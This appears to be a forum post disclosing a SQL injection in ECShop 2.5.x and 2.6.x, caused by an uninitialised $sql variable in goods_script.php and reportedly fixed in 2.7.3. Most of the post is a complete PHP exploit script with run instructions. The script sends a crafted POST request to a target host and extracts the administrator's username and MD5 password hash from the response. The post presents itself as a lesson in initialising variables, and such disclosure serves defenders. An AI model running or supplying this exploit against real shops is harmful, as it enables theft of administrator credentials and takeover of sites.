Summary:
I did not discover this vulnerability. It has already been fixed in the current 2.7.3 release, so I am posting it here to illustrate the importance of initialising variables.
refer link: http://bbs.wolvez.org/viewtopic.php?pid=179#p179
Details:
Affects 2.5.x and 2.6.x; other versions were not tested.
goods_script.php, line 44:
```php
if (empty($_GET['type'])) { ... }
elseif ($_GET['type'] == 'collection') { ... }
$sql .= " LIMIT " . (!empty($_GET['goods_num']) ? intval($_GET['goods_num']) : 10);
$res = $db->query($sql);
```
$sql is never initialised: an obvious vulnerability :)
Attack method:
Create an injection.php file in the directory containing the local php.exe and run it from the cmd prompt (the same applies on Unix).
Run: d:/php>php.exe injection.php ecshop,localhost.com /
Explanation: the arguments above are separated by spaces: $argv[0] = injection.php; $argv[1] = ecshop,localhost.com; $argv[2] = /;
Attack code:
```php
<?php
// PoC from the post: host and path are taken from the command line
// (php injection.php <host> <path>).
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$resp = send();
// The injected query returns "user_name:md5hash" as goods_id, which the page
// echoes inside an href attribute; pull it out of the response.
preg_match('#href="([\S]+):([a-z0-9]{32})"#', $resp, $hash);
if ($hash)
    exit("Exploit Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");
else
    exit("Exploit Failed!\n");

function send() {
    global $host, $path;
    // POST body: the "sql" field ends up in $sql inside goods_script.php; the
    // trailing # comments out the " LIMIT 10" that the script appends.
    $cmd = 'sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x' . bin2hex('all') . ' LIMIT 1#';
    // type is a plain number so neither branch in goods_script.php assigns $sql.
    $data  = "POST " . $path . "goods_script.php?type=" . time() . " HTTP/1.1\r\n";
    $data .= "Accept: */*\r\n";
    $data .= "Accept-Language: zh-cn\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Content-Length: " . strlen($cmd) . "\r\n";
    $data .= "Connection: Close\r\n\r\n";
    $data .= $cmd;
    $fp = fsockopen($host, 80, $errno, $errstr, 30);
    if (!$fp) {
        exit("Connection failed: $errstr ($errno)\n");
    }
    fputs($fp, $data);
    $resp = '';
    while (!feof($fp)) {
        $resp .= fread($fp, 1024);
    }
    fclose($fp);
    return $resp;
}
?>
```
Code explanation:
The script reads the command-line arguments, assembles a request carrying the custom SQL payload and sends it to goods_script.php. When type is an ordinary number, neither branch assigns $sql, so execution goes straight to appending LIMIT 10 to whatever $sql already holds; everything stems from the uninitialised variable.